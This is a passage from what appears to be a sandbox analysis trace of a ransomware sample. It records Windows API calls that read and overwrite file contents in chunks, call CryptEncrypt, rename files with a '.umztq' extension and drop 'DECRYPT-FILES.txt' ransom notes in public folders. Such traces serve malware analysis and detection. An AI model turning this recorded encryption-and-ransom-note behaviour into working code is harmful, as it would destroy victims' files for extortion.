(in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.550] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x40000, lpOverlapped=0x0) returned 1 [0089.559] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.559] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x40000, lpOverlapped=0x0) returned 1 [0089.560] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x0, lpOverlapped=0x0) returned 1 [0089.560] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.560] WriteFile (in: hFile=0x428, lpBuffer=0x3f2dcf8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f2dcf8*, lpNumberOfBytesWritten=0x3f2dce0*=0x108, lpOverlapped=0x0) returned 1 [0089.572] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.572] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 70 [0089.572] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq") returned 76 [0089.572] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.umztq"), dwFlags=0x0) returned 1 [0089.573] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\\\jkbimi8.tmp") returned 35 [0089.573] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0089.573] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0089.573] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.573] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\\\DECRYPT-FILES.txt") returned 41 [0089.573] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0089.574] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0089.574] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0089.574] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\\\jkbimi8.tmp") returned 49 [0089.574] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\videos\\sample videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0089.574] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\") returned 37 [0089.574] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.574] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\\\DECRYPT-FILES.txt") returned 55 [0089.574] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0089.575] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0089.576] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0089.576] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Videos\\Sample Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\Sample Videos\\") returned="C:\\Users\\Public\\Videos\\Sample Videos\\" [0089.576] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.576] ReadFile (in: hFile=0x428, lpBuffer=0x3f2dd04, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x3f2dd00, lpOverlapped=0x0 | out: lpBuffer=0x3f2dd04*, lpNumberOfBytesRead=0x3f2dd00*=0x108, lpOverlapped=0x0) returned 1 [0089.578] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.578] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.578] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.578] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x28, dwBufLen=0x100 | out: pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x100) returned 1 [0089.618] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.619] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.621] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.638] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.639] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.641] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.667] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.667] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.670] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.690] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.690] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.692] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.718] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.718] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.721] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.747] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.750] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.777] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.777] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.779] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.806] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.806] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.808] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.819] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.819] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.822] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.857] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.857] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.859] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.871] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.871] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.873] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.927] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.931] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.938] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.950] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.950] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.952] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.979] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.979] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.982] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0089.994] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.995] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0089.997] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.026] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.026] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.028] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.040] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.040] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.042] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.068] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.068] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.070] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.082] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.082] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.084] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.111] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.111] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.113] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.124] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.124] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.127] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.138] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.138] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.141] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.152] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.152] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.154] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.173] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.173] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.175] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0090.186] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.186] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0090.188] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x7b8a, lpOverlapped=0x0) returned 1 [0090.196] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffff8476, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.196] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x7b8a, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x7b8a, lpOverlapped=0x0) returned 1 [0090.197] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x0, lpOverlapped=0x0) returned 1 [0090.197] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.197] WriteFile (in: hFile=0x428, lpBuffer=0x3f2dcf8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f2dcf8*, lpNumberOfBytesWritten=0x3f2dce0*=0x108, lpOverlapped=0x0) returned 1 [0090.205] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0090.206] lstrlenW 